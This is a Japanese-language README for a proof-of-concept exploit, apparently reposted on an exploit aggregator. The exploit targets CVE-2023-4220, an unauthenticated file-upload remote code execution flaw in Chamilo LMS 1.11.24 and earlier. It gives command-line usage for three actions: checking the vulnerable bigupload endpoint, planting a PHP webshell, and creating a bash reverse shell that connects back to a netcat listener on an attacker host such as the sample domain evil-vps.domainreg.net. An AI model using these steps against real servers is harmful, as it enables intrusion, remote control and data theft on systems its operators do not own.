Skip to content
CVE-2023-4220-Chamilo

CVE-2023-4220-Chamilo

Sploitus September 11, 2026

##

# Chamilo LMS 認証不要の Big Upload ファイル RCE PoC

このスクリプトは、**CVE-2023-4220** で説明されている **Chamilo's LMS** ソフトウェアのセキュリティ上の欠陥を悪用するものです。このシステムは、バージョン **1.11.24** 以前で脆弱です。

リポジトリをマシンにクローンし、**pip** を使用して依存関係をインストールします(**virtualenv** を使用して、これらのインストールをグローバルインストールから分離する環境を作成することを推奨します)。

git clone

cd chamilo-lms-unauthenticated-big-upload-rce-poc

このスクリプトは、**Chamilo's** のルートパス(例:** **ターゲット URL** と、実行するアクション(**scan** 、**webshell** 、**revshell** の3つが利用可能)が必要です。

このアクションは、エンドポイント **/main/inc/lib/javascript/bigupload/files/** にアクセスして、ターゲットが脆弱かどうかをチェックします。

python3 main.py -u -a scan

![scan-demo](

このアクションは、脆弱なエンドポイントに **PHP webshell** ファイルを作成します。

python3 main.py -u -a webshell

![webshell-demo](

このアクションは、**bash リバースシェル** ファイルを作成して実行します。これを行うには、まず前のアクションと同じ方法で **webshell** を作成します。その後、いくつかのコマンドを実行して **bash** ファイルを作成・実行します。必ず、**nc** またはその他のユーティリティを使用して定義したポートで待ち受けし、リバース接続を実際に受け取れるようにしてください。また、ホストは有効な **内部/公開 IPv4** (例:**172.17.1.4** や **186.227.4.31** )でも、登録したドメイン(例:**evil-vps.domainreg.net** )でも構いません。

python3 main.py -u -a revshell

![revshell-demo](

**注:** まもなく、**Windows** ホスト向けの **Windows** ペイロードオプションを追加する予定です。

(CVE-2023-4220) Chamilo LMS 認証不要 Big Upload ファイルリモートコード実行

Extracted Entities